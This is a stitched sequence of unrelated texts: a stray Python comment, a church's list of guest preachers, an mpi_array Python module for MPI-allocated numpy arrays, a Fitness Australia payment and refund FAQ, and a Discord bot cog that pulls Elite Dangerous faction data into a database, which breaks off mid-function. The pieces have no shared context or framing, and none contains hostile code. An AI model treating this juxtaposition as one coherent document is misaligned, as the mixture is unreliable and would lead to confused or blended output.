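#   trigger = SynapticTriggerAtTimes(time_list=[100.0, 105.0, 110.0])
#   print(trigger.get_summary_string())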
|
The following people will be filling the pulpit during our time of transition.
They will be in attendance to deliver the sermon, so take note and join us!
Dr. Lombard serves our church as an Elder and Trustee, as well as a former Moderator. David is a retired psychologist who worked in both private and hospital-based practice, in addition to teaching at Wright State University.
Cliff has been a member of FCC for more than 20 years. He has served as Deacon, Elder, Vice-Moderator, Men’s Ministries Chair, Property Committee Chair, and Leader of the A/V Team. Cliff currently serves as Chairman of the Elders.
Carol is an Ordained Minister in the Christian Church (Disciples of Christ). Carol is the Pastor of Assimilation at Legacy Christian Church in Harrison, Ohio. Carol also serves on the Commission on Ministry and the Camp Christian Committee for the Christian Church in Ohio. Carol served as Associate Pastor at FCC-Middletown for 13 years. Carol also served Walnut Hills Christian Church as Co-Pastor.
Reverend Ed Bastien serves as the Pastoral Care Manager at Atrium Medical Center. Rev. Bastien holds a Master of Divinity in Theology and Religious Vocations from Asbury Theological Seminary. Ed has chaplaincy experience in both hospital and hospice settings. |
"""
==================================
The :mod:`mpi_array.locale` Module
==================================
Defines :obj:`LndarrayProxy` class and factory functions for
creating multi-dimensional arrays where memory is allocated
using :meth:`mpi4py.MPI.Win.Allocate_shared` or :meth:`mpi4py.MPI.Win.Allocate`.
Classes
=======
..
Special template for mpi_array.locale.LndarrayProxy to avoid numpydoc
documentation style sphinx warnings/errors from numpy.ndarray inheritance.
.. autosummary::
:toctree: generated/
:template: autosummary/inherits_ndarray_class.rst
lndarray - Sub-class of :obj:`numpy.ndarray` which uses MPI allocated memory buffer.
.. autosummary::
:toctree: generated/
:template: autosummary/class.rst
LndarrayProxy - Thin container for :obj:`lndarray` which provides convenience views.
PartitionViewSlices - Container for per-rank slices for created locale extent array views.
Factory Functions
=================
.. autosummary::
:toctree: generated/
empty - Create uninitialised array.
empty_like - Create uninitialised array same size/shape as another array.
zeros - Create zero-initialised array.
zeros_like - Create zero-initialised array same size/shape as another array.
ones - Create one-initialised array.
ones_like - Create one-initialised array same size/shape as another array.
copy - Create a replica of a specified array.
Utilities
=========
.. autosummary::
:toctree: generated/
NdarrayMetaData - Strides, offset and order info.
"""
from __future__ import absolute_import
import sys as _sys
import numpy as _np
import mpi4py.MPI as _mpi
import array_split as _array_split
from array_split.split import convert_halo_to_array_form as _convert_halo_to_array_form
import collections as _collections
from .license import license as _license, copyright as _copyright, version as _version
from .comms import create_distribution, get_win_memory
from .distribution import LocaleExtent as _LocaleExtent
from .distribution import HaloSubExtent as _HaloSubExtent
from .distribution import IndexingExtent as _IndexingExtent
from .utils import log_shared_memory_alloc as _log_shared_memory_alloc
from .utils import log_memory_alloc as _log_memory_alloc
from . import logging as _logging
__author__ = "Shane J. Latham"
__license__ = _license()
__copyright__ = _copyright()
__version__ = _version()
class NdarrayMetaData(object):
"""
Encapsulates, strides, offset and order argument of :meth:`LndarrayProxy.__new__`.
"""
def __init__(self, offset, strides, order):
"""
Construct.
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer.
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
"""
object.__init__(self)
self._strides = strides
self._offset = offset
self._order = order
@property
def order(self):
return self._order
class win_lndarray(_np.ndarray):
"""
Sub-class of :obj:`numpy.ndarray` which allocates buffer using
MPI window allocated memory.
"""
def __new__(
cls,
shape,
dtype=_np.dtype("float64"),
buffer=None,
offset=0,
strides=None,
order=None,
comm=None,
root_rank=0
):
"""
Construct. Allocates shared-memory (:func:`mpi4py.MPI.Win.Allocate_shared`)
buffer when :samp:`{comm}.size > 1`. Uses :func:`mpi4py.MPI.Win.Allocate`
to allocate buffer when :samp:`{comm}.size == 1`.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Local** shape of the array (used to size the allocated buffer).
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type for elements of the array.
:type buffer: :obj:`buffer`
:param buffer: The sequence of bytes providing array element storage.
Raises :obj:`ValueError` if :samp:`{buffer} is None`.
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer, i.e where array begins in buffer
(in buffer bytes).
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
:type comm: :obj:`mpi4py.Comm`
:param comm: Communicator used for allocating MPI window memory.
:type root_rank: :obj:`int`
:param root_rank: Rank of root process which allocates the shared memory.
"""
dtype = _np.dtype(dtype)
if comm is None:
raise ValueError("Got comm is None, require comm to be a valid mpi4py.MPI.Comm object")
if comm is _mpi.COMM_NULL:
raise ValueError(
"Got comm is COMM_NULL, require comm to be a valid mpi4py.MPI.Comm object"
)
if buffer is None:
num_rank_bytes = 0
rank_shape = shape
if comm.rank == root_rank:
num_rank_bytes = int(_np.product(rank_shape) * dtype.itemsize)
else:
rank_shape = tuple(_np.zeros_like(rank_shape))
logger = _logging.get_rank_logger(__name__ + "." + cls.__name__)
if (_mpi.VERSION >= 3) and (comm.size > 1):
_log_shared_memory_alloc(
logger.debug, "BEG: ", num_rank_bytes, rank_shape, dtype
)
win = \
_mpi.Win.Allocate_shared(
num_rank_bytes,
dtype.itemsize,
comm=comm
)
_log_shared_memory_alloc(
logger.debug, "END: ", num_rank_bytes, rank_shape, dtype
)
buf_isize_pair = win.Shared_query(0)
buffer = buf_isize_pair[0]
else:
_log_memory_alloc(
logger.debug, "BEG: ", num_rank_bytes, rank_shape, dtype
)
win = _mpi.Win.Allocate(num_rank_bytes, dtype.itemsize, comm=comm)
_log_memory_alloc(
logger.debug, "END: ", num_rank_bytes, rank_shape, dtype
)
buffer = get_win_memory(win)
buffer = _np.array(buffer, dtype='B', copy=False)
self = \
_np.ndarray.__new__(
cls,
shape,
dtype,
buffer,
offset,
strides,
order
)
self._comm = comm
self._win = win
return self
def __array_finalize__(self, obj):
"""
Sets :attr:`md` attribute for :samp:`{self}`
from :samp:`{obj}` if required.
:type obj: :obj:`object` or :samp:`None`
:param obj: Object from which attributes are set.
"""
if obj is None:
return
self._comm = getattr(obj, '_comm', None)
self._win = getattr(obj, '_win', None)
@property
def comm(self):
"""
The :obj:`mpi4py.MPI.Comm` communicator which was collectively used to allocate
the buffer (memory) for this array.
"""
return self._comm
@property
def win(self):
"""
The :obj:`mpi4py.MPI.Win` window which was created when allocating
the buffer (memory) for this array.
"""
return self._win
def free(self):
"""
Collective (over all processes in :attr:`comm`) free the MPI window
and associated memory buffer.
"""
self.shape = tuple(_np.zeros_like(self.shape))
if self._win is not None:
self._win.Free()
def __enter__(self):
"""
For use with :samp:`with` contexts.
"""
return self
def __exit__(self, type, value, traceback):
"""
For use with :samp:`with` contexts.
"""
self.free()
return False
class lndarray(_np.ndarray):
"""
Sub-class of :obj:`numpy.ndarray` which requires :samp:`{buffer}` to
be specified for instantiation.
"""
def __new__(
cls,
shape=None,
dtype=_np.dtype("float64"),
buffer=None,
offset=0,
strides=None,
order=None
):
"""
Construct. The :samp:`{buffer}` argument must be specified
(a :obj:`ValueError` is raised when :samp:`{buffer} is None`).
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Local** shape of the array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type for elements of the array.
:type buffer: :obj:`buffer`
:param buffer: The sequence of bytes providing array element storage.
Raises :obj:`ValueError` if :samp:`{buffer} is None`.
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer, i.e where array begins in buffer
(in buffer bytes).
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
"""
if buffer is None:
raise ValueError("Got buffer=None, require buffer allocated from LocaleComms.")
self = \
_np.ndarray.__new__(
cls,
shape,
dtype,
buffer,
offset,
strides,
order
)
self._md = NdarrayMetaData(offset=offset, strides=strides, order=order)
return self
def __array_finalize__(self, obj):
"""
Sets :attr:`md` attribute for :samp:`{self}`
from :samp:`{obj}` if required.
:type obj: :obj:`object` or :samp:`None`
:param obj: Object from which attributes are set.
"""
if obj is None:
return
self._md = getattr(obj, '_md', None)
@property
def md(self):
"""
Meta-data object of type :obj:`NdarrayMetaData`.
"""
return self._md
def free(self):
"""
Release reference to buffer. This base implementation is a no-op.
"""
pass
PartitionViewSlices = \
_collections.namedtuple(
"PartitionViewSlices",
[
"rank_view_slice_n",
"rank_view_slice_h",
"rank_view_relative_slice_n",
"rank_view_partition_slice_h",
"lndarray_view_slice_n"
]
)
if (_sys.version_info[0] >= 3) and (_sys.version_info[1] >= 5):
PartitionViewSlices.__doc__ =\
"""
Stores multiple :obj:`tuple`-of-:obj:`slice` objects indicating
the slice (tile) of the :obj:`lndarray` on which a :samp:`intra_locale_comm`
rank MPI process operates.
"""
PartitionViewSlices.rank_view_slice_n.__doc__ =\
"""
Slice indicating tile of the non-halo array.
"""
PartitionViewSlices.rank_view_slice_h.__doc__ =\
"""
The slice :attr:`rank_view_slice_n` with halo added.
"""
PartitionViewSlices.rank_view_relative_slice_n.__doc__ =\
"""
*Relative* slice which can be used to remove the
halo elements from a view generated using :attr:`rank_view_slice_h`.
"""
PartitionViewSlices.rank_view_partition_slice_h.__doc__ =\
"""
Slice indicating tile of the halo array.
"""
PartitionViewSlices.lndarray_view_slice_n.__doc__ =\
"""
Slice for generating a view of a :obj:`lndarray` with
the halo removed.
"""
#: Cache for locale array partitioning
_intra_partition_cache = _collections.defaultdict(lambda: None)
class LndarrayProxy(object):
"""
Proxy for :obj:`lndarray` instances. Provides :samp:`peer_rank`
views of the array for parallelism.
"""
#: The "low index" indices.
LO = _LocaleExtent.LO
#: The "high index" indices.
HI = _LocaleExtent.HI
def __new__(
cls,
shape=None,
dtype=_np.dtype("float64"),
buffer=None,
offset=0,
strides=None,
order=None,
intra_locale_rank=None,
intra_locale_size=0,
intra_partition_dims=None,
locale_extent=None,
halo=None,
comms_and_distrib=None,
rma_window_buffer=None
):
"""
Initialise. The :samp:`{locale_extent}` argument must be specified, and
:samp:`{shape}`, when given, must match :samp:`{locale_extent}.shape_h`.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: Shape of the array apportioned to this locale. If :samp:`None`
shape is taken as :samp:`{locale_extent}.shape_h`.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type for elements of the array.
:type buffer: :obj:`memoryview`
:param buffer: The sequence of bytes providing array element storage.
Must be specified (not :samp:`None`).
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer, i.e where array begins in buffer
(in buffer bytes).
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
:type locale_extent: :obj:`mpi_array.distribution.LocaleExtent`
:param locale_extent: The array extent to be allocated on this locale.
"""
self = object.__new__(cls)
# initialise these members before potential exceptions
# because they are referenced in self.free (via self.__del__).
self._lndarray = None
self.rma_window_buffer = None
if locale_extent is None or (not isinstance(locale_extent, _LocaleExtent)):
raise ValueError(
"Got locale_extent=%s, expecting instance of type %s"
%
(locale_extent, _LocaleExtent)
)
if (shape is not None) and (not _np.all(locale_extent.shape_h == shape)):
raise ValueError(
"Got conflicting locale shape: shape=%s, locale_extent.shape_n=%s"
%
(shape, locale_extent.shape_h)
)
self._lndarray = \
lndarray(
shape=locale_extent.shape_h,
dtype=dtype,
buffer=buffer,
offset=offset,
strides=strides,
order=order
)
self._intra_locale_rank = intra_locale_rank
self._intra_locale_size = intra_locale_size
self._intra_partition_dims = intra_partition_dims
self._locale_extent = locale_extent
self._halo = _convert_halo_to_array_form(halo, self._locale_extent.ndim)
self._intra_partition_dims = _np.zeros_like(locale_extent.shape_h)
self._intra_partition_dims, self._intra_partition = \
self.calculate_intra_partition(
intra_locale_size=self._intra_locale_size,
intra_locale_dims=self._intra_partition_dims,
intra_locale_rank=self._intra_locale_rank,
extent=self._locale_extent,
halo=self._halo
)
self.comms_and_distrib = comms_and_distrib
self.rma_window_buffer = rma_window_buffer
return self
def free(self):
"""
Release locale array memory and assign :samp:`None` to self attributes.
"""
if self._lndarray is not None:
self._lndarray.free()
self._lndarray = None
self._intra_locale_rank = None
self._intra_locale_size = None
self._intra_partition_dims = None
self._locale_extent = None
self._halo = None
self._intra_partition_dims = None
self._intra_partition = None
self.comms_and_distrib = None
if self.rma_window_buffer is not None:
self.rma_window_buffer.free()
self.rma_window_buffer = None
def __del__(self):
"""
Calls :meth:`free`.
"""
self.free()
def __enter__(self):
"""
For use with :samp:`with` contexts.
"""
return self
def __exit__(self, type, value, traceback):
"""
For use with :samp:`with` contexts.
"""
self.free()
return False
def calculate_intra_partition(
self,
intra_locale_size,
intra_locale_dims,
intra_locale_rank,
extent,
halo
):
"""
Splits :samp:`{extent}` into :samp:`self.intra_locale_size` number
of tiles.
"""
global _intra_partition_cache
key = \
(
intra_locale_size,
tuple(intra_locale_dims),
intra_locale_rank,
extent.to_tuple(),
tuple(tuple(row) for row in halo.tolist())
)
partition_pair = _intra_partition_cache[key]
if partition_pair is None:
ndim = extent.ndim
rank_view_slice_n = tuple()
rank_view_slice_h = rank_view_slice_n
rank_view_relative_slice_n = rank_view_slice_n
rank_view_partition_h = rank_view_slice_n
lndarray_view_slice_n = rank_view_slice_n
if ndim > 0:
intra_locale_dims = \
_array_split.split.calculate_num_slices_per_axis(
intra_locale_dims,
intra_locale_size
)
if extent.size_n > 0:
shape_splitter = \
_array_split.ShapeSplitter(
array_shape=extent.shape_n,
axis=intra_locale_dims,
halo=0,
array_start=extent.start_n
)
split = shape_splitter.calculate_split()
rank_extent = \
_HaloSubExtent(
globale_extent=extent,
slice=split.flatten()[intra_locale_rank],
halo=halo
)
# Convert rank_extent_n and rank_extent_h from global-indices
# to local-indices
rank_extent = extent.globale_to_locale_extent_h(rank_extent)
rank_h_relative_extent_n = \
_IndexingExtent(
start=rank_extent.start_n - rank_extent.start_h,
stop=rank_extent.start_n - rank_extent.start_h + rank_extent.shape_n,
)
rank_view_slice_n = rank_extent.to_slice_n()
rank_view_slice_h = rank_extent.to_slice_h()
rank_view_relative_slice_n = rank_h_relative_extent_n.to_slice()
rank_view_partition_h = rank_view_slice_n
if _np.any(extent.halo > 0):
shape_splitter = \
_array_split.ShapeSplitter(
array_shape=extent.shape_h,
axis=intra_locale_dims,
halo=0,
)
split = shape_splitter.calculate_split()
rank_view_partition_h = split.flatten()[intra_locale_rank]
lndarray_view_slice_n = extent.globale_to_locale_extent_h(extent).to_slice_n()
partition_pair = \
(
intra_locale_dims,
PartitionViewSlices(
rank_view_slice_n,
rank_view_slice_h,
rank_view_relative_slice_n,
rank_view_partition_h,
lndarray_view_slice_n
)
)
_intra_partition_cache[key] = partition_pair
return partition_pair
def __getitem__(self, *args, **kwargs):
"""
Return slice/item from :attr:`lndarray` array.
"""
return self._lndarray.__getitem__(*args, **kwargs)
def __setitem__(self, *args, **kwargs):
"""
Set slice/item in :attr:`lndarray` array.
"""
self._lndarray.__setitem__(*args, **kwargs)
def __eq__(self, other):
"""
"""
if isinstance(other, LndarrayProxy):
return self._lndarray == other._lndarray
else:
return self._lndarray == other
@property
def lndarray(self):
"""
An :obj:`lndarray` instance containing array data in (potentially)
shared memory.
"""
return self._lndarray
@property
def intra_partition(self):
"""
A :obj:`PartitionViewSlices` containing slices for this rank (of :samp:`peer_comm`).
"""
return self._intra_partition
@property
def intra_partition_dims(self):
"""
A sequence of integers indicating the number of partitions
along each axis which determines the per-rank views of the locale extent array.
"""
return self._intra_partition_dims
@property
def locale_extent(self):
"""
A :obj:`LocaleExtent` describing the portion of the array assigned to this locale.
"""
return self._locale_extent
@property
def halo(self):
"""
The number of ghost cells for intra locale partitioning of the extent.
This is an upper bound on the per-rank partitions, with the halo possibly
trimmed by the halo extent (due to being on globale boundary).
"""
return self._halo
@property
def md(self):
"""
Meta-data object of type :obj:`NdarrayMetaData`.
"""
return self._lndarray.md
@property
def dtype(self):
"""
A :obj:`numpy.dtype` object describing the element type of this array.
"""
return self._lndarray.dtype
@property
def shape(self):
"""
The shape of the locale array (including halo), i.e. :samp:`self.lndarray.shape`.
"""
return self._lndarray.shape
@property
def rank_view_n(self):
"""
A tile view of the array for this rank of :samp:`peer_comm`.
"""
return self._lndarray[self._intra_partition.rank_view_slice_n]
@property
def rank_view_h(self):
"""
A tile view (including halo elements) of the array for this rank of :samp:`peer_comm`.
"""
return self._lndarray[self._intra_partition.rank_view_slice_h]
@property
def rank_view_slice_n(self):
"""
Sequence of :obj:`slice` objects used to generate :attr:`rank_view_n`.
"""
return self._intra_partition.rank_view_slice_n
@property
def rank_view_slice_h(self):
"""
Sequence of :obj:`slice` objects used to generate :attr:`rank_view_h`.
"""
return self._intra_partition.rank_view_slice_h
@property
def rank_view_partition_h(self):
"""
Rank tile view from the partitioning of the entire :samp:`self._lndarray`
(i.e. partition of halo array). Same as :samp:`self.rank_view_n` when
halo is zero.
"""
return self._lndarray[self._intra_partition.rank_view_partition_slice_h]
@property
def view_n(self):
"""
View of entire array without halo.
"""
return self._lndarray[self._intra_partition.lndarray_view_slice_n]
@property
def view_h(self):
"""
The entire :obj:`LndarrayProxy` view including halo (i.e. :samp:`{self}`).
"""
return self._lndarray.view()
def fill(self, value):
"""
Fill the array with a scalar value (excludes ghost elements).
:type value: scalar
:param value: All non-ghost elements are assigned this value.
"""
self._lndarray[self._intra_partition.rank_view_slice_n].fill(value)
def fill_h(self, value):
"""
Fill the array with a scalar value (including ghost elements).
:type value: scalar
:param value: All elements (including ghost elements) are assigned this value.
"""
self._lndarray[self._intra_partition.rank_view_partition_slice_h].fill(value)
def empty(
shape=None,
dtype="float64",
comms_and_distrib=None,
order='C',
return_rma_window_buffer=False,
intra_partition_dims=None,
**kwargs
):
"""
Creates array of uninitialised elements.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Global** shape to be distributed amongst
memory nodes.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type of array elements.
:type comms_and_distrib: :samp:`None` or result of :func:`mpi_array.comms.create_distribution`
:param comms_and_distrib: Communications and distribution info for the array;
when :samp:`None`, one is created from :samp:`{shape}` and :samp:`{kwargs}`.
:rtype: :obj:`LndarrayProxy`
:return: Newly created array with uninitialised elements.
"""
if comms_and_distrib is None:
comms_and_distrib = create_distribution(shape=shape, **kwargs)
intra_locale_rank = comms_and_distrib.locale_comms.intra_locale_comm.rank
intra_locale_size = comms_and_distrib.locale_comms.intra_locale_comm.size
locale_extent = \
comms_and_distrib.distribution.get_extent_for_rank(
inter_locale_rank=comms_and_distrib.this_locale.inter_locale_rank
)
rma_window_buffer = \
comms_and_distrib.locale_comms.alloc_locale_buffer(
shape=locale_extent.shape_h,
dtype=dtype
)
kwargs = dict()
if not return_rma_window_buffer:
kwargs = {
"comms_and_distrib": comms_and_distrib,
"rma_window_buffer": rma_window_buffer,
}
ret = \
LndarrayProxy(
shape=rma_window_buffer.shape,
buffer=rma_window_buffer.buffer,
dtype=dtype,
order=order,
intra_locale_rank=intra_locale_rank,
intra_locale_size=intra_locale_size,
intra_partition_dims=intra_partition_dims,
locale_extent=locale_extent,
halo=comms_and_distrib.distribution.halo,
**kwargs
)
if return_rma_window_buffer:
ret = ret, rma_window_buffer
return ret
def empty_like(ary, dtype=None):
"""
Return a new array with the same shape and type as a given array.
:type ary: :obj:`numpy.ndarray`
:param ary: Copy attributes from this array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Specifies different dtype for the returned array.
:rtype: :samp:`type(ary)`
:return: Array of uninitialized (arbitrary) data with the same shape and type as :samp:`{ary}`.
"""
if dtype is None:
dtype = ary.dtype
if (isinstance(ary, LndarrayProxy)):
ret_ary = \
empty(
dtype=ary.dtype,
comms_and_distrib=ary.comms_and_distrib,
order=ary.md.order,
intra_partition_dims=ary.intra_partition_dims
)
else:
ret_ary = _np.empty_like(ary, dtype=dtype)
return ret_ary
def zeros(shape=None, dtype="float64", comms_and_distrib=None, order='C', **kwargs):
"""
Creates array of zero-initialised elements.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Global** shape to be distributed amongst
memory nodes.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type of array elements.
    :type comms_and_distrib: :samp:`None` or comms-and-distribution object
    :param comms_and_distrib: Communicator and distribution info used to
       allocate the array; if :samp:`None`, one is created from :samp:`{shape}`.
:rtype: :obj:`LndarrayProxy`
:return: Newly created array with zero-initialised elements.
"""
ary = empty(shape, dtype=dtype, comms_and_distrib=comms_and_distrib, order=order, **kwargs)
ary.fill_h(ary.dtype.type(0))
return ary
def zeros_like(ary, *args, **kwargs):
"""
Return a new zero-initialised array with the same shape and type as a given array.
:type ary: :obj:`LndarrayProxy`
:param ary: Copy attributes from this array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Specifies different dtype for the returned array.
:rtype: :obj:`LndarrayProxy`
:return: Array of zero-initialized data with the same shape and type as :samp:`{ary}`.
"""
ary = empty_like(ary, *args, **kwargs)
ary.fill_h(ary.dtype.type(0))
return ary
def ones(shape=None, dtype="float64", comms_and_distrib=None, order='C', **kwargs):
"""
Creates array of one-initialised elements.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Global** shape to be distributed amongst
memory nodes.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type of array elements.
    :type comms_and_distrib: :samp:`None` or comms-and-distribution object
    :param comms_and_distrib: Communicator and distribution info used to
       allocate the array; if :samp:`None`, one is created from :samp:`{shape}`.
:rtype: :obj:`LndarrayProxy`
:return: Newly created array with one-initialised elements.
"""
ary = empty(shape, dtype=dtype, comms_and_distrib=comms_and_distrib, order=order, **kwargs)
ary.fill_h(ary.dtype.type(1))
return ary
def ones_like(ary, *args, **kwargs):
"""
Return a new one-initialised array with the same shape and type as a given array.
:type ary: :obj:`LndarrayProxy`
:param ary: Copy attributes from this array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Specifies different dtype for the returned array.
:rtype: :obj:`LndarrayProxy`
:return: Array of one-initialized data with the same shape and type as :samp:`{ary}`.
"""
ary = empty_like(ary, *args, **kwargs)
ary.fill_h(ary.dtype.type(1))
return ary
def copy(ary):
"""
Return an array copy of the given object.
:type ary: :obj:`LndarrayProxy`
:param ary: Array to copy.
:rtype: :obj:`LndarrayProxy`
:return: A copy of :samp:`ary`.
"""
ary_out = empty_like(ary)
ary_out.rank_view_n[...] = ary.rank_view_n[...]
return ary_out
__all__ = [s for s in dir() if not s.startswith('_')]
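# ---------------------------------------------------------------------------
# Minimal usage sketch (shape and fill values are illustrative; assumes an MPI
# launch, e.g. ``mpirun -n 4 python my_script.py``, with ``create_distribution``
# imported/defined as above):
#
#   ary = zeros(shape=(1000, 1000), dtype="float64")  # distributed zeros
#   ary.fill(42)                                      # set non-ghost elements
#   brr = ones_like(ary)                              # same shape/distribution
#   crr = copy(brr)                                   # copy of rank-local view
# ---------------------------------------------------------------------------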
|
Online transactions: Fill in your details and Fitness Australia will charge the transaction to your account.
Mail - send the completed form with payment (with your credit card details OR cheque OR Australian money order) to Fitness Australia at the address below.
Fax - fax the completed form with payment (credit card details - cheque and Australian money orders cannot be processed via fax) to 1300 734 613.
2. I have an issue with a payment; who can I speak to?
It is important to Fitness Australia that all clients understand their rights and obligations in relation to refunds.
Fitness Australia Exercise Professional & Business Registration is a non-refundable fee.
Should you believe that your circumstances require special consideration for a refund, please make an application in writing to the Manager, Industry Services via email to [email protected], fax to 1300 734 613 or via mail to PO Box 6453, Alexandria 2015.
Should a refund be granted a $55.00 (inc GST) Administration Fee will apply.
NOTE: If your refund request is approved you will be required to send in your original registration documents before your refund can be processed.
4. When will you debit/charge my account?
Payment is debited once the application has been submitted. We usually take about one week to process applications.
You will receive a tax receipt, issued by Fitness Australia Limited (ABN: 51 131 422 403), on receipt of payment.
5. I’m due to renew my Fitness Business registration, when can I do this?
Registration is for one year commencing on the date your application is accepted and is renewable on the anniversary of the date for a subsequent year.
All registration fees must be paid annually in advance. |
from datetime import datetime
import discord
from discord.ext import commands
import asyncio
import checks
import database
from dateutil.parser import isoparse
from config import BGS_CHANNEL
from data.faction import Faction
from web import Web
class BGS(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
self.system_cache = {}
self.faction_cache = {}
self.updated_systems = set()
self.last_tick = None
self.tick_id = 0
self.faction_data = {
75253: Faction(75253, "Colonists of Aurora", "https://inara.cz/minorfaction/44432/"),
23831: Faction(23831, "Prismatic Imperium", "https://inara.cz/minorfaction/25441/"),
74847: Faction(74847, "Adamantine Union", "https://inara.cz/minorfaction/35809/")
}
self.war_cache = {}
# @commands.command(name='fullscan', case_insensitive=True, hidden=True)
# @commands.check(checks.can_manage_bot)
async def _full_scan(self, ctx, *, faction_name):
async with ctx.typing():
await self._fullscan_faction(faction_name, 1)
await ctx.send("done")
async def _fullscan_faction(self, faction_name, page):
args = {
'factionname': faction_name,
'page': page
}
data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems', args, 'object')
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
tick_select = "SELECT id as tick_id, time FROM tick ORDER BY time DESC LIMIT 1"
self.tick_id = (await db.fetchrow(tick_select))['tick_id']
for system in data.docs:
if str(system.id) not in self.system_cache:
self.system_cache[str(system.id)] = system.name
insert_system = "INSERT INTO star_system VALUES ($1, $2, $3, $4 , $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15) ON CONFLICT DO NOTHING "
if str(system.controlling_minor_faction_id) in self.faction_cache:
controling_faction_name = self.faction_cache[str(system.controlling_minor_faction_id)]
else:
controling_faction_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions', {'eddbid': system.controlling_minor_faction_id}, 'object')
controling_faction_name = controling_faction_data.docs[0].name
self.faction_cache[str(system.controlling_minor_faction_id)] = controling_faction_name
our_faction = 0
for faction in system.minor_faction_presences:
if faction.minor_faction_id in self.faction_data:
our_faction = faction.minor_faction_id
system_values = (
system.id,
system.name,
system.x,
system.y,
system.z,
controling_faction_name,
system.needs_permit,
system.power,
system.power_state,
system.reserve_type,
system.primary_economy,
system.security,
system.population,
system.edsm_id,
our_faction
)
await db.execute(insert_system, *system_values)
for faction in system.minor_faction_presences:
await self._process_faction_data(faction.minor_faction_id)
states = ""
pending = ""
recovering = ""
for state in faction.active_states:
if len(states) > 0:
states = states + '|'
states = states + state.name
for state in faction.pending_states:
if len(pending) > 0:
pending = pending + '|'
pending = pending + state.name
for state in faction.recovering_states:
if len(recovering) > 0:
recovering = recovering + '|'
recovering = recovering + state.name
async with db.transaction():
insert_influence = "INSERT INTO influence(faction, system, influence, tick, states, pending, recovering) VALUES($1, $2, $3, $4, $5, $6, $7) ON CONFLICT DO NOTHING"
influence_values = (
faction.minor_faction_id,
system.id,
faction.influence,
self.tick_id,
states,
pending,
recovering
)
await db.execute(insert_influence, *influence_values)
await database.Database.close_connection(db)
if int(data.page) < int(data.pages):
await self._fullscan_faction(faction_name, page + 1)
async def _process_faction_data(self, faction_id):
args = {
'eddbid': faction_id
}
data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions', args, 'object')
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
for faction in data.docs:
if str(faction_id) not in self.faction_cache:
self.faction_cache[str(faction.id)] = faction.name
insert_faction = "INSERT INTO faction VALUES ($1, $2, $3, $4, $5, $6) ON CONFLICT DO NOTHING "
if faction.home_system_id is not None:
if str(faction.home_system_id) in self.system_cache:
system_name = self.system_cache[str(faction.home_system_id)]
else:
home_system_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems', {'eddbid': faction.home_system_id}, 'object')
system_name = home_system_data.docs[0].name
self.system_cache[str(faction.home_system_id)] = system_name
else:
system_name = ""
faction_values = (
faction.id,
faction.name,
faction.is_player_faction,
system_name,
faction.allegiance,
faction.government
)
await db.execute(insert_faction, *faction_values)
await database.Database.close_connection(db)
async def _get_system_id(self, system_name):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_result = await db.fetchrow("SELECT id FROM star_system where name = $1", system_name)
if system_result is None:
home_system_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems',
{'name': system_name}, 'object')
for system in home_system_data.docs:
if str(system.id) not in self.system_cache:
self.system_cache[str(system.id)] = system.name
insert_system = "INSERT INTO star_system VALUES ($1, $2, $3, $4 , $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15) ON CONFLICT DO NOTHING "
if str(system.controlling_minor_faction_id) in self.faction_cache:
controling_faction_name = self.faction_cache[str(system.controlling_minor_faction_id)]
else:
controling_faction_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions',
{'eddbid': system.controlling_minor_faction_id},
'object')
controling_faction_name = controling_faction_data.docs[0].name
self.faction_cache[str(system.controlling_minor_faction_id)] = controling_faction_name
our_faction = 0
for faction in system.minor_faction_presences:
if faction.minor_faction_id in self.faction_data:
our_faction = faction.minor_faction_id
system_values = (
system.id,
system.name,
system.x,
system.y,
system.z,
controling_faction_name,
system.needs_permit,
system.power,
system.power_state,
system.reserve_type,
system.primary_economy,
system.security,
system.population,
system.edsm_id,
our_faction
)
system_id = system.id
await db.execute(insert_system, *system_values)
else:
system_id = system_result['id']
await database.Database.close_connection(db)
return system_id
async def _get_faction_id(self, faction_name):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
faction_result = await db.fetchrow("SELECT id FROM faction where name = $1", faction_name)
if faction_result is None:
